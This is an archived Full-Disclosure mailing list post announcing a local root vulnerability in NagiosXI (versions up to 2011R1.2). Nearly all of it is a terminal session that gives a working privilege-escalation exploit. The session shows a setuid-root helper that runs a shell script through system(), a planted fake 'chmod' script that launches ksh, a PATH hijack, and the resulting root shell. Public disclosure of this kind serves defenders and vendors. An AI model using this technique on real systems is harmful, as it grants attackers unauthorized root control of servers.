| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Thu, 12 May 2011 08:25:28 +0000
From: rootbsd <rootbsd@...ted.com>
To: full-disclosure@...ts.grok.org.uk
Subject: NagiosXI (commerciale Nagios) Local Root
# Exploit Title: NagiosXI (Commercial Nagios) Local Root Vulnerability
# Date: 2011-05-15
# Author: RootBSD
# Software Link: http://www.nagios.com
# Version: <= 2011R1.2
# Tested on: all linux
rootbsd@...top:~$ id
uid=1001(rootbsd) gid=1001(rootbsd) groupes=1001(rootbsd)
rootbsd@...top:~$ ls -l /usr/local/nagiosxi/scripts/reset_config_perms
-rwsr-xr-x 1 root nagios 5258 2011-04-11 20:38 reset_config_perms
rootbsd@...top:~$ cat /usr/local/nagiosxi/scripts/reset_config_perms.c
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
if(setuid( 0 )!=0)
printf("ERROR TRYING TO SETUID ROOT!\n");
else
printf("SETUID ROOT OK\n");
system( "/usr/local/nagiosxi/scripts/reset_config_perms.sh" );
return 0;
}
rootbsd@...top:~$ cat /home/rootbsd/chmod
#!/usr/bin/ksh
ksh
rootbsd@...top:~$ chmod 755 /home/rootbsd/chmod
rootbsd@...top:~$ export PATH=/home/rootbsd:$PATH
rootbsd@...top:~$ /usr/local/nagiosxi/scripts/reset_config_perms
SETUID ROOT OK
RESETTING PERMS
# id
uid=0(root) gid=0(root) groupes=0(root)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists